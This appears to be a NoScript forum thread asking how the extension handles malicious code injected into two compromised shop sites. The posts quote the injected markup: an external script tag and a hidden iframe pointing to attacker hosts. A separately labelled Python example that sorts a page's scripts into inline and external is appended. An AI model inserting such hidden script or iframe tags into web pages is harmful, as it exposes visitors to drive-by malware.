Inline Script Blockage
Posted: Mon Aug 01, 2011 3:55 pm
by therube
Is the script here (jquery.js) considered "inline" script?
And to be clear, it is blocked by NoScript, by default, even if the primary domain (vikingimporting.com) is allowed?
Code:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Viking Importing</title><script src=http://exero.eu/catalog/jquery.js></script><title></title>
<base href="http://www.vikingimporting.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
MALWARE WARNING: h t t p ://w w w.vikingimporting.com/
IFRAME Blockage
Posted: Mon Aug 01, 2011 4:02 pm
by therube
And while we're here ...
Code:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Mammoth Equipment<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
<base href="http://mammothequipment.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
The IFRAME is blocked - if Options | Embeddings | Forbid <IFRAME> is enabled?
And even if it were not, script from willysy.com would not run unless it were specifically allowed?
MALWARE WARNING: h t t p :// mammothequipment.com/
Re: Inline Script Blockage
Posted: Fri Feb 03, 2012 9:47 pm
by therube
Giorgio wrote:
Inline scripts are blocked by default on non-whitelisted sites.
You cannot disable them selectively on whitelisted sites, if that's what you're asking for, but you can modify their execution environment to "cripple" them or otherwise change their behavior by writing your own page-level script surrogates.
http://forums.informaction.com/viewtopi ... 936#p34936
So explain further, because I'm still not clear.
I have not allowed vikingimporting.com.
Because of that, scripts from exero.eu will not run.
Though that is always the case, unless I have specifically allowed exero.eu?
Will "inlined" exero.eu run from vikingimporting.com, if vikingimporting.com is NOT allowed, but exero.eu has been Allowed?
Yes, I think it will? At least plugins (Flash) may work that way?
Now, if I allow vikingimporting.com, then ... ?
Then exero.eu ... will run, even though not specifically Allowed? And that is dangerous.
Explain further or clear my misunderstanding if you would.
Thanks.
Re: Inline Script Blockage
Posted: Fri Feb 03, 2012 9:51 pm
by therube
Re: Inline Script Blockage
Posted: Mon Oct 28, 2013 10:17 pm
by Thrawn
therube wrote:
Is the script here (jquery.js) considered "inline" script?
No.
Inline script is when you define the JavaScript within the page itself, rather than including a link to an external script file.
Code:
<html>
<head>
<script type="text/javascript">
alert("Hello world!");
</script>
And NoScript blocks inline scripts if the domain that they come from (i.e. the domain of the page you're on) is blocked.
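An added example, not part of any post in this thread: a small Python check that applies the inline/external distinction described above to a page's markup and reports which host each script belongs to. The names `ScriptClassifier` and `classify_scripts` are made up for this example, the sample markup is constructed from the snippets quoted in the thread, and the code only classifies scripts; it does not model NoScript's allow/block decision.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptClassifier(HTMLParser):
    """Label each <script> as inline or external and record the host it belongs to."""

    def __init__(self, page_url):
        super().__init__()
        self.base = page_url  # replaced if a <base href> is seen
        self.page_host = urlsplit(page_url).hostname
        self.found = []
        self._inline = None  # inline script currently being read

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and attrs.get("href"):
            self.base = urljoin(self.base, attrs["href"])
        elif tag == "script" and attrs.get("src"):
            # External: the code is fetched from the host named in src.
            host = urlsplit(urljoin(self.base, attrs["src"])).hostname
            self.found.append({"kind": "external", "host": host,
                               "third_party": host != self.page_host})
        elif tag == "script":
            # Inline: the code is part of the page, so it belongs to the page's host.
            self._inline = {"kind": "inline", "host": self.page_host,
                            "third_party": False, "code": ""}
            self.found.append(self._inline)

    def handle_data(self, data):
        if self._inline is not None:
            self._inline["code"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = None


def classify_scripts(html, page_url):
    parser = ScriptClassifier(page_url)
    parser.feed(html)
    parser.close()
    return parser.found


# Constructed sample: the first snippet quoted in the thread plus the inline example.
SAMPLE = """<head><title>Viking Importing</title><script src=http://exero.eu/catalog/jquery.js></script><title></title>
<base href="http://www.vikingimporting.com/">
<script type="text/javascript">alert("Hello world!");</script></head>"""

for s in classify_scripts(SAMPLE, "http://www.vikingimporting.com/"):
    print(s["kind"], s["host"], "third-party" if s["third_party"] else "page's own host")
```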